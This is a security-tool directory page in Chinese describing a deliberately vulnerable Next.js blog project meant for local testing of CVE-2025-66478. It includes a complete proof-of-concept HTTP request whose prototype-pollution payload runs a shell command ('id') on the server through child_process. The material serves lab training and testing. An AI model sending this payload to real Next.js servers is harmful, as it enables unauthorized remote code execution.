Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-66478_rce_vulnerable — 重要:专为教育、测试和利用目的而创建的 Next JS 漏洞项目,不建议在生产环境中安装,仅限本地或受控环境使用。 | Kitploit
工具/GitHubGitHub/letalandroid/cve-2025-66478_rce_vulnerable
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubletalandroid/cve-2025-66478_rce_vulnerable

cve-2025-66478_rce_vulnerable

重要:专为教育、测试和利用目的而创建的 Next JS 漏洞项目,不建议在生产环境中安装,仅限本地或受控环境使用。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库网站
2个月前尚未审核
分享

使用 shadcn/ui 的现代博客

一个使用 Next.js 16、React 19、shadcn/ui 和 Tailwind CSS 构建的现代优雅博客。

重要提示:

Next JS 漏洞项目,仅为教育、测试和利用目的而创建,不建议在生产环境中安装,仅限本地或受控环境使用

PoC

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Reference: github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478

特点

  • 🎨 现代设计:使用 shadcn/ui 构建的优雅界面
  • 📝 完整博客:包含模拟内容的多个博客文章
  • 💬 反应系统:用不同的表情(点赞、喜爱、大笑、惊讶、悲伤、愤怒)对帖子做出反应
  • 👤 身份验证:使用 localStorage 的注册和登录系统
  • 🎯 响应式:完全响应式设计
  • 🌙 暗色模式:支持自动暗色模式

技术

  • Next.js 16 - React 框架
  • React 19 - UI 库
  • shadcn/ui - 现代 UI 组件
  • Tailwind CSS 4 - 实用样式
  • TypeScript - 静态类型
  • Lucide React - 图标
  • Radix UI - 可访问组件

安装

  1. 安装依赖:
root@kitploit:~
npm install
# o
yarn install
# o
pnpm install
  1. 启动开发服务器:
root@kitploit:~
npm run dev
# o
yarn dev
# o
pnpm dev
  1. 在浏览器中打开 http://localhost:3000。

项目结构

root@kitploit:~
├── app/                    # Páginas de Next.js
│   ├── blog/[id]/         # Página de detalle del blog
│   ├── profile/            # Página de perfil
│   ├── layout.tsx          # Layout principal
│   └── page.tsx            # Página principal
├── components/             # Componentes React
│   ├── auth/              # Componentes de autenticación
│   ├── blog/              # Componentes del blog
│   ├── layout/             # Componentes de layout
│   └── ui/                 # Componentes shadcn/ui
├── lib/                    # Utilidades y servicios
│   ├── auth.ts            # Servicio de autenticación
│   ├── mocks.ts           # Datos mock
│   └── utils.ts           # Utilidades generales
└── public/                 # Archivos estáticos

功能

身份验证

  • 注册新用户
  • 登录
  • 存储在 localStorage
  • 用户个人资料

博客

  • 主页上的文章列表
  • 每篇文章的详情页面
  • 作者信息
  • 分类和标签
  • 封面图片

反应

  • 查看一篇帖子的所有反应
  • 用不同的表情做出反应
  • 按类型统计反应数
  • 做出反应的用户列表

模拟数据

所有数据(博客、用户、反应)完全是模拟的,并动态生成。不需要数据库。

备注

  • 用户凭据存储在 localStorage 中
  • 每次页面重新加载时数据会重新生成
  • 反应系统仅为视觉效果(不持久化新的反应)

许可证

本项目仅用于教育目的。

下载工具